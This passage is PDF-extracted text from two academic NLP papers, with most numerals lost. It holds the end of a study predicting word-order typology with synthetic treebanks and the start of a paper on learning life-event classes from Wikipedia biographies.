). the system in the starred row is the one that we selected for row of table . . contribution of different feature classes to understand the contribution of different hand- engineered features, we performed forward selec- tion tests on the depth- system, including only some of the features. in all cases, we trained in the “+gd” condition. the results are shown in ta- ble . any class of features is substantially better than baseline, but we observe that most of the total benefit can be obtained with just pmi or asymme- try features. those features indicate, for example, whether a verb tends to attract nouns to its right or left. we did not see a gain from length thresholding. . robustness to noisy input we also tested our directionality prediction system on noisy input (without retraining it on noisy input). specifically, we tested the depth- sh system. this time, when evaluating on the dev split of a held-out language, we provided a noisy version of that input corpus that had been retagged by an automatic pos tagger (nguyen et al., ), which was trained on just gold-tagged sentences from the train split of that language. the average tagging accuracy over the languages was only . %. nonetheless, the “ud”-trained and “+gd”-trained systems got re- spective losses of . and . —nearly as good as in table , which used gold pos tags. ms n ec ∅ ud +gd loss . . . . . . table : cross-validation average expected loss of the two grammar induction methods, ms (mareček and straka, ) and n (naseem et al., ), compared to the ec heuristic of § and our architecture of § (the version from the last line of table ). in these experiments, the dependency relation types are ordered pos pairs. n harnesses prior linguistic knowl- edge, but its improvement upon ms is not statistically signif- icant. both grammar induction systems are significantly worse than the rest of the systems, including even our two baseline systems, namely ec (the “expected count” heuristic from § ) and ∅ (the no-feature baseline system from table line ). like n , these baselines make use of some cross-linguistic knowl- edge, which they extract in different ways from the training tree- banks. among our own systems, ec is significantly worse than all others, and +gd is significantly better than all others. (note: when training the baselines, we found that including the +gd languages—a bias-variance tradeoff— harmed ec but helped ∅. the table reports the better result in each case.) . hyperparameter settings for each result in tables – , the hyperparameters were chosen by grid search on the cross-validation objective (and the table reports the best result). for the remaining experiments, we select the depth- combined models ( ) for both “ud” and “+gd,” as they are the best models according to table . the hyperparameters for the selected models are as follows: when training with “ud,” we took α = (which ignores sn), with hidden layer size h = , ψ = sigmoid, l coeff = (no l regularization), and dropout = . . when training with “+gd,” we took α = . , with different hy- perparameters for the two interpolated models: sh uses h = , ψ = sigmoid, l coeff = , and dropout = . , while sn uses h = , emb size = , rnn size = , ψ = relu, l coeff = , and dropout = . . for both “ud” and “+gd”, we use λ = for the smoothing in footnote . . comparison with grammar induction grammar induction is an alternative way to predict word order typology. given a corpus of a language, we can first use grammar induction to parse it into dependency trees, and then estimate the directional- ity of each dependency relation type based on these (approximate) trees. however, what are the dependency relation types? current grammar induction systems produce unla- beled dependency edges. rather than try to obtain . . . . . . . . . average proportion . . . . . . . . . . ε -i n s e n s it iv e l o s s cc det emph ccomp prt remnant nsubjpasscsubj conj foreign vocative neg discourse mark case auxpass mwe advcl aux amod reflex parataxis advmod nsubj nummod reparandum punct relcl tmod compound csubjpass poss goeswith xcomp cop name dep appos list nmod dobj iobj expl predetpreconj acl figure : cross-validation loss broken down by relation. we plot each relation r with x coordinate = the proportion of r in the average training corpus = meanl∈train p∗train(r | l) ∈ [ , ], and with y coordinate = the weighted average∑ l∈heldout wl(r) lossε(p̂dev(→|r,l),p ∗ dev(→|r,l)) (see ( )). a ud label like r = amod for each edge, we la- bel the edge deterministically with a pos pair such as r = (parent = noun,child = adj). thus, we will attempt to predict the directionality of each pos-pair relation type. for comparison, we retrain our supervised system to do the same thing. for the grammar induction system, we try the implementation of dmv with stop-probability es- timation by mareček and straka ( ), which is a common baseline for grammar induction (le and zuidema, ) because it is language-independent, reasonably accurate, fast, and convenient to use. we also try the grammar induction system of naseem et al. ( ), which is the state-of-the-art system on ud (noji et al., ). naseem et al. ( )’s method, like ours, has prior knowledge of what typ- ical human languages look like. table shows the results. compared to mareček and straka ( ), naseem et al. ( ) gets only a small (insignificant) improvement—whereas our “ud” system halves the loss, and the “+gd” sys- tem halves it again. even our baseline systems are significantly more accurate than the grammar induc- tion systems, showing the effectiveness of casting the problem as supervised prediction. . fine-grained analysis beyond reporting the aggregate cross-validation loss over the training languages, we break down the cross-validation predictions by relation type. fig- ure shows that the frequent relations are all quite . . . . . . ε-insensitive loss (baseline) . . . . . . ε -i n se n si ti v e l o ss ( fu ll m o d e l) cc det emph ccomp prt remnant nsubjpasscsubj conj foreign vocative neg discourse mark case auxpass mwe advcl aux amod reflex parataxis advmod nsubj nummod reparandum punct relcl tmod compound csubjpass poss goeswith xcomp cop name dep appos list nmod dobj iobj expl predetpreconj acl figure : the y coordinate is the average loss of our model (table line ), just as in figure , whereas the x coordinate is the average loss of a simple baseline model ∅ that ignores the input corpus (table line ). relations whose directionality varies more by language have higher baseline loss. relations that beat the baseline fall below the diagonal line. the marker size for each relation is proportional to the x-axis in figure . predictable. figure shows that our success is not just because the task is easy—on relations whose di- rectionality varies by language, so that a baseline method does poorly, our system usually does well. to show that our system is behaving well across languages and not just on average, we zoom in on relation types that are particularly common or of particular interest to linguistic typologists. these relations together account for % of all relation to- kens in the average language: nmod = noun-nominal modifier order, nsubj = subject-verb order (feature a in the world atlas of language structures), dobj = object-verb order ( a), amod = adjective- noun order ( a), and case = placement of both adpositions and case markers ( a). as shown in figure , most points in the first five plots fall in or quite near the desired region. we are pleased to see that the predictions are robust when the training data is unbalanced. for example, the case relation points leftward in most real lan- guages, yet our system can still predict the right di- rectionality of “hi”, “et” and “fi.” the credit goes to the diversity of our training set, which contains various synthetic case-right languages: the system fails on these three languages if we train on real lan- guages only. that said, apparently our training set is still not diverse enough to do well on the outlier “ar” (arabic); see figure in wang and eisner ( ). . . . . . . true . . . . . . p re d ic ti o n no grc_proiel ar da pt et cs grc it got de la_proiel frbg fi la_itt es nl hi en nmod . . . . . . true . . . . . . p re d ic ti o n no grc_proiel arda pt et cs grc it got de la_proiel fr bg fi la_itt es nlhi en nsubj . . . . . . true . . . . . . p re d ic ti o n no grc_proiel ar da pt et cs grc it got de la_proiel fr bg fi la_itt es nl hi en dobj . . . . . . true . . . . . . p re d ic ti o n no grc_proiel ar da pt et cs grc it got de la_proiel fr bgfi la_itt es nl hi en amod . . . . . . true . . . . . . p re d ic ti o n no grc_proielar da pt et cs grc itgot de la_proielfr bg fi la_itt es nl hi en case . . . . . . true . . . . . . p re d ic ti o n nogrc_proielar dapt etcs grcitgotdela_proielfr bg fila_itt esnl hien case (trained with ud) figure : scatterplots of predicted vs. true directionalities (by cross-validation). in the plot for relation type r, each language appears as a marker at (p∗, p̂) (see § ), with the marker size pro- portional to wl(r) (see ( )). points that fall between the solid lines (|p̂−p∗| ≤ ε) are considered “correct,” by the definition of ε-insensitive loss. the last plot (bottom right) shows worse predictions for case when the model is trained on ud only. . binary classification accuracy besides ε-insensitive loss, we also measured how the systems perform on the coarser task of binary classification of relation direction. we say that re- lation r is dominantly “rightward” in language l iff p∗(→| r,l) > . . we say that a system predicts “rightward” according to whether p̂(→| r,l) > . . we evaluate whether this binary prediction is cor- rect for each of the most frequent relations r, for each held-out language l, using -fold cross- validation over the training languages l as in the previous experiment. tables and respectively summarize these results by relation (equal average relation rate ec ∅ ud +gd nmod . . . . . punct . . . . . case . . . . nsubj . . . . . det . . . . . dobj . . . . . amod . . . . . advmod . . . . . cc . . . . . conj . mark . . . . . advcl . . . . . cop . . . . . aux . . . . . iobj . . . . . acl . . . . . nummod . . . . . xcomp . . . . neg . ccomp . . . . . avg. - . . . . table : accuracy on the simpler task of binary classification of relation directionality. the most common relations are shown first: the “rate” column gives the average rate of the relation across the training languages (like the x coordinate in fig. ). over languages) and by language (equal average over relations). keep in mind that these systems had not been specifically trained to place relations on the correct side of the artificial . boundary. binary classification is an easier task. it is easy because, as the ∅ column in table indicates, most relations have a clear directionality preference shared by most of the ud languages. as a result, the better models with more features have less opportu- nity to help. nonetheless, they do perform better, and the ec heuristic continues to perform worse. in particular, ec fails significantly on dobj and iobj. this is because nsubj, dobj, and iobj often have different directionalities (e.g., in svo languages), but the ec heuristic will tend to pre- dict the same direction for all of them, according to whether nouns tend to precede nearby verbs. . final evaluation on test data all previous experiments were conducted by cross- validation on the training languages. we now train the system on all , and report results on the blind test languages (table ). in our evaluation metric ( ), r includes all relation types that ap- pear in training data, plus a special unk type for target ec ∅ ud +gd ar . . . . bg . . . . cs . . da . . . . de . . . . en . es . . . . et . . . . fi . . . . fr . . . . got . . . . grc . . . . grc proiel . . . . hi . . . . it . . . . la itt . . . . la proiel . . . . nl . . . . no . . pt . . . . avg. . . . . table : accuracy on the simpler task of binary classification of relation directionality for each training language. a detailed comparison shows that ec is significantly worse than ud and +gd, and that ∅ is significantly worse than +gd (paired permu- tation test over the languages, p < . ). the improvement from ud to +gd is insignificant, which suggests that this is an easier task where weak models might suffice. relations that appear only in test data. the results range from good to excellent, with synthetic data providing consistent and often large improvements. these results could potentially be boosted in the future by using an even larger and more diverse training set. in principle, when evaluating on any one of our real languages, one could train a sys- tem on all of the other (plus the galactic lan- guages derived from them), not just . moreover, the universal dependencies collection has contin- ued to grow beyond the languages used here (§ ). finally, our current setup extracts only one training example from each (real or synthetic) language. one could easily generate a variant of this example each time the language is visited during stochastic opti- mization, by bootstrap-resampling its training cor- pus (to add “natural” variation) or subsampling it (to train the predictor to work on smaller corpora). in the case of a synthetic language, one could also gen- erate a corpus of new trees each time the language is visited (by re-running the stochastic permutation procedure, instead of reusing the particular permuta- tion released by the galactic dependencies project). test train target ud +gd target ud +gd cu . . ar . . el . . bg . . eu . . cs . . fa . . da . . fi ftb . . de . . ga . . en . . he . . es . . hr . . et . . hu . . fi . . id . . fr . . ja ktc . . got . . la . . grc . . pl . . grc proiel . . ro . . hi . . sl . . it . . sv . . la itt . . ta . . la proiel . . nl . . no . . pt . . test avg. . . * all avg. . . * table : our final comparison on the test languages appears at left. we ask whether the average expected loss on these real target languages is reduced by augmenting the training pool of ud languages with + * * gd languages. for com- pleteness, we extend the table with the cross-validation results on the training pool. the “avg.” lines report the average of test or training+testing languages. we mark both “+gd” av- erages with “*” as they are significantly better than their “ud” counterparts (paired permutation test by language, p < . ). related work typological properties can usefully boost the per- formance of cross-linguistic systems (bender, ; o’horan et al., ). these systems mainly aim to annotate low-resource languages with help from models trained on similar high-resource languages. naseem et al. ( ) introduce a “selective shar- ing” technique for generative parsing, in which a subject-verb language will use parameters shared with other subject-verb languages. täckström et al. ( ) and zhang and barzilay ( ) extend this idea to discriminative parsing and gain further im- provements by conjoining regular parsing features with typological features. the cross-linguistic neu- ral parser of ammar et al. ( ) conditions on ty- pological features by supplying a “language embed- ding” as input. zhang et al. ( ) use typological properties to convert language-specific pos tags to ud pos tags, based on their ordering in a corpus. moving from engineering to science, lin- guists seek typological universals of human lan- guage (greenberg, ; croft, ; song, ; hawkins, ), e.g., “languages with domi- nant verb-subject-object order are always preposi- tional.” dryer and haspelmath ( ) characterize world languages with typological proper- ties. their wals database can supply features to nlp systems (see previous paragraph) or gold stan- dard labels for typological classifiers. daumé iii and campbell ( ) take wals as input and propose a bayesian approach to discover new universals. georgi et al. ( ) impute missing properties of a language, not by using universals, but by backing off to the language’s typological cluster. murawaki ( ) use wals to help recover the evolutionary tree of human languages; daumé iii ( ) consid- ers the geographic distribution of wals properties. attempts at automatic typological classification are relatively recent. lewis and xia ( ) pre- dict typological properties from induced trees, but guess those trees from aligned bitexts, not by mono- lingual grammar induction as in § . . liu ( ) and futrell et al. ( ) show that the directional- ity of (gold) dependencies is indicative of “basic” word order and freeness of word order. those papers predict typological properties from trees that are au- tomatically (noisily) annotated or manually (expen- sively) annotated. an alternative is to predict the ty- pology directly from raw or pos-tagged text, as we do. saha roy et al. ( ) first explored this idea, building a system that correctly predicts adposition typology on / languages with only word co- occurrence statistics. zhang et al. ( ) evaluate semi-supervised pos tagging by asking whether the induced tag sequences can predict typological prop- erties. their prediction approach is supervised like ours, although developed separately and trained on different data. they more simply predict binary- valued wals properties, using independent bi- nary classifiers based on pos bigram and trigrams. our task is rather close to grammar induction, which likewise predicts a set of real numbers giv- ing the relative probabilities of competing syntactic configurations. most previous work on grammar in- duction begins with maximum likelihood estimation of some generative model—such as a pcfg (lari and young, ; carroll and charniak, ) or dependency grammar (klein and manning, )— though it may add linguistically-informed inductive bias (ganchev et al., ; naseem et al., ). most such methods use local search and must wres- tle with local optima (spitkovsky et al., ). fine- grained typological classification might supplement this approach, by cutting through the initial com- binatorial challenge of establishing the basic word- order properties of the language. in this paper we only quantify the directionality of each relation type, ignoring how tokens of these relations interact lo- cally to give coherent parse trees. grammar induc- tion methods like em could naturally consider those local interactions for a more refined analysis, when guided by our predicted global directionalities. conclusions and future work we introduced a typological classification task, which attempts to extract quantitative knowledge about a language’s syntactic structure from its sur- face forms (pos tag sequences). we applied super- vised learning to this apparently unsupervised prob- lem. as far as we know, we are the first to utilize synthetic languages to train a learner for real lan- guages: this move yielded substantial benefits. figure shows that we rank held-out languages rather accurately along a spectrum of directionality, for several common dependency relations. table shows that if we jointly predict the directionalities of all the relations in a new language, most of those numbers will be quite close to the truth (low aggre- gate error, weighted by relation frequency). this holds promise for aiding grammar induction. our trained model is robust when applied to noisy pos tag sequences. in the future, however, we would like to make similar predictions from raw word sequences. that will require features that ab- stract away from the language-specific vocabulary. although recurrent neural networks in the present paper did not show a clear advantage over hand- engineered features, they might be useful when used with word embeddings. finally, we are interested in downstream uses. several nlp tasks have benefited from typologi- cal features (§ ). by using end-to-end training, our methods could be tuned to extract features (existing or novel) that are particularly useful for some task. although wang and eisner ( ) review uses of synthetic training data elsewhere in machine learning. acknowledgements this work was funded by the u.s. national science foundation under grant no. . we are grateful to the state of maryland for providing indispensable computing resources via the maryland advanced research computing cen- ter (marcc). we thank the argo lab members for useful discussions. finally, we thank tacl action editor mark steedman and the anonymous review- ers for high-quality suggestions, including the ec baseline and the binary classification evaluation. references waleed ammar, george mulcaire, miguel balles- teros, chris dyer, and noah smith. many lan- guages, one parser. transactions of the associ- ation of computational linguistics, : – , . emily m. bender. linguistically naı̈ve != language independent: why nlp needs linguistic typol- ogy. in proceedings of the eacl workshop on the interaction between linguistics and com- putational linguistics: virtuous, vicious or vacu- ous?, pages – , . glenn carroll and eugene charniak. two experi- ments on learning probabilistic dependency gram- mars from corpora. in working notes of the aaai workshop on statistically-based nlp techniques, pages – , . kyunghyun cho, bart van merrienboer, dzmitry bahdanau, and yoshua bengio. on the properties of neural machine translation: encoder-decoder approaches. in proceedings of eighth workshop on syntax, semantics and structure in statistical translation, pages – , . noam chomsky. lectures on government and bind- ing: the pisa lectures. holland: foris publica- tions, . noam chomsky and howard lasnik. the theory of principles and parameters. in syntax: an inter- national handbook of contemporary research, joachim jacobs, arnim von stechow, wolfgang sternefeld, and theo vennemann, editors. berlin: de gruyter, . william croft. typology and universals. cambridge university press, . hal daumé iii. non-parametric bayesian areal lin- guistics. in proceedings of human language technologies: the annual conference of the north american chapter of the association for computational linguistics, pages – , . hal daumé iii and lyle campbell. a bayesian model for discovering typological implications. in proceedings of the th annual meeting of the association of computational linguistics, pages – , . matthew s. dryer and martin haspelmath, editors. the world atlas of language structures online. max planck institute for evolutionary anthropol- ogy, leipzig, . http://wals.info/. joakim nivre, et al. universal dependencies . . lindat/clarin digital library at the institute of formal and applied linguistics, charles uni- versity in prague. data available at http:// universaldependencies.org, . robert frank and shyam kapur. on the use of trig- gers in parameter setting. linguistic inquiry, : – , . richard futrell, kyle mahowald, and edward gib- son. quantifying word order freedom in depen- dency corpora. in proceedings of the third inter- national conference on dependency linguistics, pages – , . kuzman ganchev, joao graça, jennifer gillenwater, and ben taskar. posterior regularization for struc- tured latent variable models. journal of machine learning research, : – , . ryan georgi, fei xia, and william lewis. com- paring language similarity across genetic and typologically-based groupings. in proceedings of the rd international conference on computa- tional linguistics, pages – , . edward gibson and kenneth wexler. triggers. lin- guistic inquiry, ( ): – , . xavier glorot and yoshua bengio. understanding the difficulty of training deep feedforward neu- ral networks. in proceedings of the international conference on artificial intelligence and statis- tics, . joseph h. greenberg. some universals of grammar with particular reference to the order of mean- ingful elements. in universals of language, joseph h. greenberg, editor, pages – . mit press, . john a. hawkins. word order universals. elsevier, . sepp hochreiter and jürgen schmidhuber. long short-term memory. neural computation, ( ): – , . dan klein and christopher manning. corpus-based induction of syntactic structure: models of depen- dency and constituency. in proceedings of the nd annual meeting of the association for com- putational linguistics, pages – , . karim lari and steve j. young. the estimation of stochastic context-free grammars using the inside-outside algorithm. computer speech and language, ( ): – , . phong le and willem zuidema. unsupervised de- pendency parsing: let’s use supervised parsers. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, pages – , . william d. lewis and fei xia. automatically iden- tifying computationally relevant typological fea- tures. in proceedings of the third international joint conference on natural language process- ing: volume-ii, . haitao liu. dependency direction as a means of word-order typology: a method based on de- pendency treebanks. lingua, ( ): – , . david mareček and milan straka. stop-probability estimates computed on a large corpus improve un- supervised dependency parsing. in proceedings of the st annual meeting of the association for computational linguistics (volume : long pa- pers), pages – , . yugo murawaki. continuous space representations of linguistic typology and their application to phy- logenetic inference. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, pages – , . tahira naseem, harr chen, regina barzilay, and mark johnson. using universal linguistic knowl- edge to guide grammar induction. in proceedings of the conference on empirical methods in natural language processing, pages – , . tahira naseem, regina barzilay, and amir glober- son. selective sharing for multilingual depen- dency parsing. in proceedings of the th an- nual meeting of the association for computa- tional linguistics (volume : long papers), pages – , . dat quoc nguyen, dai quoc nguyen, dang duc pham, and son bao pham. rdrpostagger: a ripple down rules-based part-of-speech tagger. in proceedings of the demonstrations at the th conference of the european chapter of the asso- ciation for computational linguistics, pages – , . hiroshi noji, yusuke miyao, and mark johnson. using left-corner parsing to encode universal structural constraints in grammar induction. in proceedings of the conference on empirical methods in natural language processing, pages – , . helen o’horan, yevgeni berzak, ivan vulic, roi reichart, and anna korhonen. survey on the use of typological information in natural language processing. in proceedings of the th interna- tional conference on computational linguistics: technical papers, pages – , . rishiraj saha roy, rahul katare, niloy ganguly, and monojit choudhury. automatic discovery of adposition typology. in proceedings of the th international conference on computational linguistics: technical papers, pages – , . jae jung song. linguistic typology: morphology and syntax. routledge, . valentin i. spitkovsky, hiyan alshawi, and daniel jurafsky. from baby steps to leapfrog: how “less is more” in unsupervised dependency parsing. in human language technologies: the an- nual conference of the north american chapter of the association for computational linguistics, pages – , . valentin i. spitkovsky, hiyan alshawi, and daniel jurafsky. breaking out of local optima with count transforms and model recombination: a study in grammar induction. in proceedings of the conference on empirical methods in natural language processing, pages – , . oscar täckström, ryan mcdonald, and joakim nivre. target language adaptation of discrimina- tive transfer parsers. in proceedings of the conference of the north american chapter of the association for computational linguistics: hu- man language technologies, pages – , . tijmen tieleman and geoffrey hinton. lecture . —rmsprop: divide the gradient by a running average of its recent magnitude. coursera: neural networks for machine learning, . dingquan wang and jason eisner. the galac- tic dependencies treebanks: getting more data by synthesizing new languages. transactions of the association of computational linguistics, : – , . data available at https:// github.com/gdtreebank/gdtreebank. yuan zhang and regina barzilay. hierarchical low- rank tensors for multilingual transfer parsing. in proceedings of the conference on empirical methods in natural language processing, pages – , . yuan zhang, roi reichart, regina barzilay, and amir globerson. learning to map into a uni- versal pos tagset. in proceedings of the joint conference on empirical methods in nat- ural language processing and computational natural language learning, pages – , . yuan zhang, david gaddy, regina barzilay, and tommi jaakkola. ten pairs to tag—multilingual pos tagging via coarse mapping between embed- dings. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, pages – , . unsupervised discovery of biographical structure from text david bamman school of computer science carnegie mellon university pittsburgh, pa , usa dbamman@cs.cmu.edu noah a. smith school of computer science carnegie mellon university pittsburgh, pa , usa nasmith@cs.cmu.edu abstract we present a method for discovering abstract event classes in biographies, based on a prob- abilistic latent-variable model. taking as in- put timestamped text, we exploit latent corre- lations among events to learn a set of event classes (such as born, graduates high school, and becomes citizen), along with the typical times in a person’s life when those events occur. in a quantitative evalua- tion at the task of predicting a person’s age for a given event, we find that our genera- tive model outperforms a strong linear regres- sion baseline, along with simpler variants of the model that ablate some features. the ab- stract event classes that we learn allow us to perform a large-scale analysis of , wikipedia biographies. though it is known that women are greatly underrepresented on wikipedia—not only as editors (wikipedia, ) but also as subjects of articles (reagle and rhue, )—we find that there is a bias in their characterization as well, with biogra- phies of women containing significantly more emphasis on events of marriage and divorce than biographies of men. introduction the written text that we interact with on an everyday basis—news articles, emails, social media, books— contains a vast amount of information centered on people: news (including common nlp corpora such as the new york times and the wall street journal) details the roles of actors in current events, social media (including twitter and facebook) documents the actions and attitudes of friends, and books chron- icle the stories of fictional characters and real people alike. this focus on people gives us an abundance of information on how the lives of those portrayed un- fold; for corpora that include historically deep bi- ographical information (such as wikipedia, book- length biographies and autobiographies, and even newspaper obituaries) this data includes the actors involved in particular historical events and the times and places in which they occur. the life events de- scribed in these texts have natural structure: event classes exhibit correlations with each other (e.g., those who divorce must have been married), can occur at roughly similar times in the lives of dif- ferent individuals (marriage is more likely to oc- cur earlier in one’s life than later), and can be bound to historical moments as well (fights in world war ii peaks in the early s). social scientists have long been interested in the structure of these events in investigating the role that individual agency and larger social forces play in shaping the course of an individual’s life. life stages marking “transitions to adulthood” (such as leaving school, entering the workforce and marriage) have important correlates with de- mographic variables (modell et al., ; hogan and astone, ; shanahan, ); and researchers study the interactional effects that life events have on each other, such as the relationship between di- vorce and pre-marital cohabitation (lillard et al., ; reinhold, ) or having children (lillard and waite, ). the data on which these studies draw, however, has largely been restricted to categorical surveys and observational data; we present here a latent- variable model that exploits the correlations of event descriptions in text to learn the structure of abstract events, grounded in time, from text alone. while our transactions of the association for computational linguistics, ( ) – . action editor: jian su. submitted / ; published / . c© association for computational linguistics. model can be estimated on any set of texts where the birth dates of a set of mentioned entities are known, we illustrate our method on a large-scale dataset of , biographies extracted from wikipedia. this paper makes two contributions: first, we present a general unsupervised model for learning life event classes from biographical text, along with the structure that binds them; second, in using this method to learn event classes from wikipedia, we uncover evidence of systematic bias in the presen- tation of male and female biographies (with biogra- phies of women containing significantly dispropor- tionate emphasis on the personal events of mar- riage and divorce). in addition to these contribu- tions, we also present a range of other analyses that uncovering life events in text can make possible. data and code to support this work can be found at http://www.ark.cs.cmu.edu/bio/. data the data for this analysis originates in the january , dump of english-language wikipedia. we extract biographies by identifying all articles with persondata metadata in which the date of birth field is known. this results in a set of , biographies. for each biography, we perform part-of-speech tagging using the stanford pos tagger (toutanova et al., ) and named entity recognition using the stanford named entity recognizer (finkel et al., ), cluster all mentions of co-referring proper names (davis et al., ; elson et al., ) and resolve pronominal co-reference (bamman et al., ), aided by gender inference for each entity as the gender corresponding to the maximum number of gendered pronouns (i.e., he and she) mentioned in the article, as also used by reagle and rhue ( ). in a random test set of articles, this method of gender inference is overwhelmingly ac- curate, achieving % precision with . % recall ( articles had no pronominal mentions and so gen- der is not assigned). http://dumps.wikimedia.org/enwiki/ /enwiki- -pages-articles. xml.bz “persondata is a special set of metadata that can and should be added to biographical articles only” (http://en. wikipedia.org/wiki/wikipedia:persondata). as further preprocessing, we identify multiword expressions in all texts as maximal sequences of adjective + noun part of speech tags (yielding, for example, new york, united states, early life and high school), as first described in justeson and katz ( ). for each biographical article, we then ex- tract all sentences in which the subject of the ar- ticle is mentioned along with a single date and re- tain only the terms in each sentence that are among the most frequent , unigrams and multiword expressions in all documents, excluding stopwords such as the and all numbers (including dates). an “event” is the bag of these unigrams and multiword expressions extracted from one such sentence, along with a corresponding timestamp measured as the dif- ference between the observed date in the sentence and the date of birth of the entity. table illustrates the actual form of the data with a sample of extracted sentences from the biography of frank lloyd wright, along with the data as input to the model. in the terminology of the model de- scribed below, each sentence constitutes one “event” in the subject’s life. for the final dataset we retain all biographies where the subject of the article is born after the year and for which there exist at least events ( , people). the complete data consists of , , events across these , people. model the quantities of interest that we want to learn from the data are: .) a broad set of major life events recorded in wikipedia biographies that people expe- rience at similar stages in their lives (such as being born, graduating high school, serving in the army, getting married, and so on); .) correlations among those life events (e.g., knowing that if an individual wins a nobel prize that they’re more likely to receive an honorary doctorate); and .) an attribution of those classes of events to particular moments in a specific indi- vidual’s life (e.g., john nash received an hon- orary doctorate in ). we cast this problem as an unsupervised learning one; given no labeled instances, can we infer these quantities from text alone? one possible alterna- tive approach would be to leverage the categorical original sentence data as input to model terms (w) time (t) he was admitted to the university of wisconsin– madison as a special student in . admitted university wisconsin madison special student wright first traveled to japan in , where he bought hundreds of prints. wright first traveled japan bought hundreds prints after wright’s return to the united states in octo- ber , wright persuaded his mother to buy land for him in spring green, wisconsin. wright return united states wright persuaded mother buy land spring green wisconsin this philosophy was best exemplified by his design for fallingwater ( ), which has been called “the best all-time work of american architecture”. philosophy best design called best all-time work american architecture already well known during his lifetime, wright was recognized in by the american institute of architects as “ the greatest american architect of all time.” already well known lifetime wright recognized american institute architects greatest american architect time table : a sample of of the sentences (original and converted) that constitute the data for frank lloyd wright (born ). each event is defined as one such temporally-scoped sentence. information contained in wikipedia biographies (or its derivatives, such as freebase; google, ) as a form of supervision (e.g., george washington is a member of the categories presidents of the united states and american cartographers, among others). these manual categories, however, are often spo- radically annotated and have a long tail (with most categories appearing very few times); in learning event structure directly from text, we avoid relying on categories’ accuracy and being constrained by a fixed ontology. one advantage of an unsupervised approach is that we eliminate the need to define a pre-determined set of event classes a priori, allow- ing application across a variety of different domains and time periods, such as full-text books from the internet archive or hathi trust, or historical works like the oxford dictionary of national biography (matthew and harrison, ). figure a illustrates the graphical form of our hi- erarchical bayesian model, which articulates the re- lationship between an entity’s set of events (where each event is an observation defined as the bag of terms in text and the difference between the year it was recorded as happening and the birth year), an abstract set of event classes, correlations among those abstract classes, and the distribution of vocab- ulary terms that defines each one. to capture corre- lations among different classes, we place a logistic normal prior on each biography’s distribution over event classes (blei and lafferty, a; blei and lafferty, ; mimno et al., ); unlike a dirich- let, a logistic normal is able to capture arbitrary cor- relations between elements through the structure of the covariance matrix of its underlying multivariate normal. we take a bayesian approach to estimating the mean µη and covariance Ση, drawing them from a conjugate normal-inverse wishart prior. the generative story for the model runs as fol- lows: let k be the number of latent event classes, p be the number of biographies, and ep be the number of events in biography p. • draw event class means and covariances µη ∈ rk, Ση ∈ rk×k ∼ normal-inverse wishart(µ ,λ, Ψ,ν) • for each event class i ∈{ , . . . ,k}: - draw event-term distribution φk ∼ dir(γ) • for each biography p: - draw ηp ∼n(µη, Ση) - convert ηp into biography-event proportions βp through the softmax function: βp,i = exp(ηp,i)∑k k= exp(ηp,k) - for each event e in biography p: - draw event class index z ∼ mult(βp) - draw timestamp t ∼n(µz,σ z) - for each token in event e: - draw term w ∼ mult(φz) z w t η µη Ση niw φ γ σ µ w e p (a) full. z w t η α φ γ σ µ w e p (b) –correlation. η ∼ dir(α) z w η µη Ση niw φ γ w e p (c) –time z w η α φ γ w e p (d) –correlation, –time. η ∼ dir(α) figure : graphical form of the full model (described in § ) and models with ablations (described in § ). inference proceeds via stochastic em: after ini- tializing all variables to random values, we alter- nate between collapsed gibbs sampling for the la- tent class indicators followed by maximization steps over all other parameters: . sample all z using collapsed gibbs sampling conditioned on current values for η and all other z. . for each biography p, maximize likelihood with respect to ηp via gradient ascent given the current samples of z and priors µη and Ση. . assign map estimates of µη and Ση given current values of η and the normal-inverse wishart prior. update µ and σ according to its maximum likelihood estimate given z. we describe the technical details of each step be- low. sampling z. given fixed biography-event class proportions η, observed tokens w, timestamp t, and current samples z− for all other events, the proba- bility of a given event belonging to event class k is as follows: p(z = k | z−,w,t,η,γ,µ,σ ) ∝ exp(ηk) ×σ− k exp ( −(t−µk) σ k ) × ∏v v= ∏e(v) i= (γ + c −(k,v) + i− ) ∏ne n= (v γ + c −(k,?) + n− ) ( ) here c−(k,v) is the count of the number of times vocabulary term v shows up in all events whose cur- rent sample z = k (excepting the current one being sampled), c−(k,?) is the total count of all terms in all events whose current z = k (again excepting the current one), ne is the number of terms in event e, and e(v) is the count of vocabulary term v in the cur- rent event. (note the complexity of the last term is due to drawing multiple observations from a single collapsed multinomial; carpenter, .) maximizing η. under our model, the terms in the likelihood function that involve η include the likeli- hood of the samples drawn from it and its own prob- ability given the multivariate normal prior: l(η) ∝ n∏ n= exp(ηzn )∑k k= exp(ηk) ×n(η | µη, Ση) ( ) the log likelihood is proportional to: `(η) ∝ n∑ n= ηzn − n∑ n= k∑ k= exp(ηk) − (η −µη)> Σ− η (η −µη) ( ) given samples of the latent event class z for all events in biography p, we maximize the value of ηp using gradient ascent. we can think of this as maxi- mizing the likelihood of the observations z subject to ` (gaussian) regularization, where the covariance matrix in the regularizer encourages correlations in η: if a document contains many examples of z = k and zk is highly correlated with zj, then the optimal η is encouraged to contain high weights at both ηk and ηj rather than simply ηk alone. maximizing µη, Ση,µ,σ . given values for η, we then find maximum a posteriori estimates of µη and Ση conditioned on the normal-inverse wishart (niw) prior. the niw is a conjugate prior to a mul- tivariate gaussian, parameterized by dimensionality k, initial mean µ , positive-definite scale matrix Ψ, and scalars ν > k − and λ > . the prior parameters Ψ and ν have an intuitive interpretation as the scatter matrix ∑ν i= (xi − x̄) (xi − x̄) > for ν pseudo-observations. the expected value of the covariance matrix drawn from a niw distribution parameterized by Ψ and ν is Ψ ν−k− . to disprefer correlations among topics in the absence of strong evidence, we fix µ = and set Ψ so that this prior expectation over Ση is the product of a scalar value ρ and the iden- tity matrix i: Ψ = (ν − k − )ρi; ρ defines the expected variance, and the higher the value of ν, the more strongly the prior dominates the posterior es- timate of the covariance matrix (i.e., the more the covariance matrix is shrunk toward ρi). λ likewise has an intuitive understanding as a dampening pa- rameter: the higher its value, the more the posterior estimate of the mean µ̂ shrinks toward . for n data points, we set λ = n/ , ν = k + , and ρ = . since the niw is conjugate with the multivariate normal, posterior updates to µη and Ση have closed- form expressions given values of η (here, η̄ denotes the mean value of η over all biographies). µ̂η = n λ + n η̄ ( ) Σ̂η = Ψ + ∑n i= (ηi − η̄) (ηi − η̄) > + λn λ+n η̄η̄> ν + n + k + ( ) since we have no meaningful prior information on the values of µ and σ , we calculate their maximum likelihood estimate given current samples z. evaluation while the goal of this work is to learn qualitative categories of 